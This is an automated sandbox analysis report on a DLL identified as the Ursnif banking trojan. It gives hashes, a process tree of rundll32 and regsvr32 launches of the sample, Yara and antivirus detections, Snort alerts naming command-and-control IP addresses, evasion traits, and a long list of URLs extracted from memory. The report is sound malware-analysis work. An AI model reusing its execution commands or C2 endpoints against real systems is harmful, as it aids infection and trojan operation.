Windows Analysis Report qT9Qk5aKTk.dll

Overview

General Information

Sample Name: qT9Qk5aKTk.dll
Analysis ID: 481107
MD5: 58d9e2906f42336e9bee1137b4cf5839
SHA1: 7f29e42f6d317d7b11ad164a672e91e4515b5bc0
SHA256: a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf

Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Writes or reads registry keys via WMI
PE file has nameless sections
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Registers a DLL
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5004 cmdline: loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 2800 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1404 cmdline: rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5828 cmdline: regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 2760 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 1112 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6664 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3340 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5784 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82974 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 2448 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5440 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6296 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6440 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6540 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6840 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7160 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2736 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 816 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4844 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5680 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4196 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4868 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 580 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7044 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6660 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6668 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1744 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7100 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
25.2.rundll32.exe.510000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
25.0.rundll32.exe.510000.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.400000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
19.2.rundll32.exe.400000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
25.0.rundll32.exe.510000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: qT9Qk5aKTk.dll, Virustotal: Detection: 80%
Source: qT9Qk5aKTk.dll, Metadefender: Detection: 59%
Source: qT9Qk5aKTk.dll, ReversingLabs: Detection: 82%
Antivirus / Scanner detection for submitted sample
Source: qT9Qk5aKTk.dll, Avira: detected
Source: 0.2.loaddll32.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 19.0.rundll32.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 33.2.rundll32.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 19.2.rundll32.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 19.0.rundll32.exe.400000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: qT9Qk5aKTk.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F912D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02F912D4
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_023E12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_023E12D4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49824 -> 13.225.29.191:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49887 -> 13.225.29.191:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49887 -> 13.225.29.191:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49935 -> 13.225.29.204:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49935 -> 13.225.29.204:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49938 -> 13.225.29.191:80
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
                      Source: WerFault.exe, 00000023.00000002.429475012.0000000005347000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.453464879.0000000004DF2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
                      Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
                      Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
                      Source: auction[1].htm.6.drString found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=_pGcdKMGIS.z.lCTqTjkg1MN5VDhw.LVmKPE.vsvy8xqR9tt
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                      Source: auction[1].htm.6.drString found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562&amp;epi=de-ch
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                      Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                      Source: auction[1].htm.6.drString found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=ofrom5sGIS_KXxy9_JDp4mX9JHjHM.c541SmqMEFZwTH
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1631265095&amp;rver=7.0.6730.0&am
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1631265096&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1631265095&amp;rver=7.0.6730.0&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
                      Source: auction[1].htm.6.drString found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                      Source: auction[1].htm.6.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
                      Source: auction[1].htm.6.drString found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=8579855945c54b10b74180716ce798ce&amp;r=infopane&amp;i=3&
                      Source: imagestore.dat.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOgGQ4.img?h=368&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpo
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/die-schulen-sind-am-anschlag-ansteckungen-unter-ki
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mit-dem-neubau-der-zurich-versicherung-ist-ein-wei
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wie-ein-engl%c3%a4nder-seine-schwangere-frau-vor-c
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/betrunkener-kia-fahrer-30-streift-polizeiauto-und-haut-ab/ar-AA
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/blaualgen-tr%c3%bcben-den-z%c3%bcrichsee-bei-freienbach/ar-AAOf
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/frau-hielt-schafe-im-badezimmer-ihrer-mietwohnung/ar-AAOhQkc?oc
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/kanton-z%c3%bcrich-beerdigt-westtangente-wetzikon/ar-AAOi8HP?oc
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/nach-13-positiven-tests-drei-klassen-m%c3%bcssen-in-quarant%c3%
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/v%c3%b6llig-absurd-f%c3%bcnftkl%c3%a4ssler-m%c3%bcssen-trotz-qu
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/other/seit-corona-kommt-es-vermehrt-zu-t%c3%a4tlichkeiten/ar-AAOf1Pv
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
                      Source: unknown. DNS traffic detected: queries for: www.msn.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
